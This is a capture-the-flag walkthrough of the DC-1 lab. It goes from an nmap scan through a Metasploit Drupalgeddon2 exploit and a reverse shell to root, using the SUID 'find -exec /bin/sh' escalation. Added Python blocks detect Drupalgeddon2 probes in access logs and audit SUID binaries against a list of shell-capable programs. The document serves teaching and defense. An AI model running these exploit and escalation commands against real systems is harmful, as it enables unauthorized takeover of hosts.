DC1 OffSec Walkthrough: Today we are going to take on another boot2root challenge, known as “DC1”, in which our goal is to get root access to complete the challenge.
Security Level: Beginner
Penetration Methodology:
- Network scanning (Nmap)
- Surfing HTTP service port (80)
- Finding Drupal CMS
- Exploiting Drupalgeddon2 to get a reverse shell
- Finding files with SUID bit set
- Finding the “find” command with SUID bit set
- Getting root shell with “find” command
- Getting final flag
Walkthrough
Let’s start off with scanning our target with nmap.
nmap -sV 192.168.1.104

The Nmap output shows us that there are 3 ports open: 22 (SSH), 80 (HTTP), 111 (RPC).
We find that port 80 is running HTTP, so we open the IP in our browser.

When we access the web service we find that the server is running Drupal CMS. Since the target is running Drupal, we check whether it is vulnerable to the Drupalgeddon2 exploit. We run the exploit against the target machine using Metasploit and successfully get a reverse shell.
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
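The defensive counterpart to the exploitation step above, added here as an example and not part of the original walkthrough or of the Metasploit module: Drupalgeddon2 works because Drupal's render arrays use '#'-prefixed keys for internal callbacks, and the upstream fix strips any such key coming from the client. The script mirrors that idea as a request-parameter sanitizer and as a scan over Apache combined-format access logs for an encoded '#' (%23) in the query string. The log lines and the parameter dict are constructed samples, not captures from the DC-1 box.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Drupal render arrays use '#'-prefixed keys (for example '#post_render')
# for internal callbacks. Such keys must never arrive from the client,
# which is what the upstream fix for Drupalgeddon2 enforces by stripping
# them from incoming request data. This regex finds a '#' at the start
# of any bracketed segment of a PHP-style parameter key.
_HASH_SEGMENT = re.compile(r"(^|\[)#")

# Apache/nginx combined log format; only the fields this check needs.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (not captured from the DC-1 box).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /node/1 HTTP/1.1" 200 5123
192.0.2.77 - - [01/Jan/2020:10:00:05 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 219
192.0.2.10 - - [01/Jan/2020:10:00:09 +0000] "GET /user/login HTTP/1.1" 200 4410
"""


def is_render_key(key: str) -> bool:
    """True if a (possibly URL-encoded) parameter key has a '#' segment."""
    return _HASH_SEGMENT.search(unquote(key)) is not None


def sanitize_params(params: dict) -> tuple:
    """Drop '#'-prefixed keys from parsed query/body parameters.

    Returns (clean_params, dropped_keys); dropped keys are kept in input
    order so they can be logged as-is."""
    clean, dropped = {}, []
    for key, value in params.items():
        if is_render_key(key):
            dropped.append(key)
        else:
            clean[key] = value
    return clean, dropped


def suspicious_requests(log_text: str) -> list:
    """Flag log lines whose query string smuggles a '#' into Drupal.

    A literal '#' never reaches the server inside a URL (it starts the
    fragment), so an encoded '%23' in the query string is a signal on its
    own; a '#'-prefixed parameter key is reported as a separate reason."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        reasons = []
        if "#" in unquote(parts.query):
            reasons.append("encoded '#' in query string")
        if any(is_render_key(k) for k in parse_qs(parts.query, keep_blank_values=True)):
            reasons.append("render-array key in query parameters")
        if reasons:
            hits.append({"ip": m["ip"], "method": m["method"],
                         "path": parts.path, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
    # Constructed body parameters as a web application would parse them.
    clean, dropped = sanitize_params(
        {"form_id": "user_register_form", "mail[#post_render][]": "<placeholder>"})
    print("kept:", clean, "dropped:", dropped)
```

Run it against a real access log by feeding the file contents to suspicious_requests; patching Drupal is the actual fix, and this scan is only a way to tell whether the unpatched box was probed before the patch landed.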
After getting a reverse shell we spawn a TTY shell using python. Then we search the server for files with the SUID bit set and find that the “find” binary has it.
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null

As the “find” command has the SUID bit set, we can use it to execute commands as the “root” user. Checking GTFOBins for the SUID entry for find gives us ./find . -exec /bin/sh -p \; -quit. We adapt this to the binary's full path, /usr/bin/find . -exec /bin/sh \; -quit, run it, and finally get root access.
/usr/bin/find . -exec /bin/sh \; -quit
# cd /root
# cat proof.txt
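The SUID hunt and the escalation through “find” above are the attacker's view; the audit below is an added example (not part of the original walkthrough) of the check a system owner would run to catch the same misconfiguration first. It walks the filesystem for SUID regular files, splits them into a constructed baseline of binaries that are normally SUID, a GTFOBins-style set of binaries that can spawn a shell or run commands, and everything else, and prints the chmod u-s remediation for the dangerous ones. Both name sets are assumptions to tune to the distribution in use.

```python
import os
import re
import stat
import sys

# Binaries whose SUID bit is normal on a stock Debian-family install
# (constructed baseline; adjust it to your distribution's package list).
EXPECTED_SUID = {
    "passwd", "su", "sudo", "mount", "umount", "ping", "chsh", "chfn",
    "gpasswd", "newgrp", "fusermount", "pkexec",
}

# Binaries that can run arbitrary commands or spawn a shell, so a SUID
# bit on any of them hands root to every local user; this is the
# GTFOBins pattern the walkthrough uses with "find".
SHELL_CAPABLE = {
    "find", "vim", "vi", "nano", "less", "more", "bash", "sh", "dash",
    "python", "perl", "ruby", "nmap", "awk", "gawk", "env", "tar",
    "cp", "mv", "xargs", "tee",
}

# Pseudo filesystems that are noise for this audit.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_suid_mode(mode: int) -> bool:
    """True for a regular file with the setuid bit set (from st_mode)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def _canonical(name: str) -> str:
    """Strip a version suffix so 'python2.7' and 'ping6' match the sets."""
    return re.sub(r"[\d.]+$", "", name) or name


def find_suid(root: str = "/") -> list:
    """Walk the tree under root and return paths of SUID regular files."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for f in filenames:
            path = os.path.join(dirpath, f)
            try:
                st = os.lstat(path)   # lstat: never follow symlinks
            except OSError:
                continue
            if is_suid_mode(st.st_mode):
                hits.append(path)
    return hits


def classify_suid_paths(paths) -> dict:
    """Sort SUID paths into shell_capable / expected / unknown buckets."""
    report = {"shell_capable": [], "expected": [], "unknown": []}
    for path in paths:
        name = _canonical(os.path.basename(path))
        if name in SHELL_CAPABLE:
            report["shell_capable"].append(path)
        elif name in EXPECTED_SUID:
            report["expected"].append(path)
        else:
            report["unknown"].append(path)
    return report


def remediation(report: dict) -> list:
    """Commands that remove the setuid bit from the dangerous binaries."""
    return ["chmod u-s " + p for p in report["shell_capable"]]


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    report = classify_suid_paths(find_suid(root))
    for bucket, paths in report.items():
        print(bucket + ":")
        for p in paths:
            print("  " + p)
    print("remediation:")
    for cmd in remediation(report):
        print("  " + cmd)
```

On the DC-1 box this would list /usr/bin/find under shell_capable and propose chmod u-s /usr/bin/find; the "unknown" bucket is where custom SUID helpers show up and deserves a manual look rather than an automatic chmod.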
Finally, this lab is solved; see you in the next lab 😉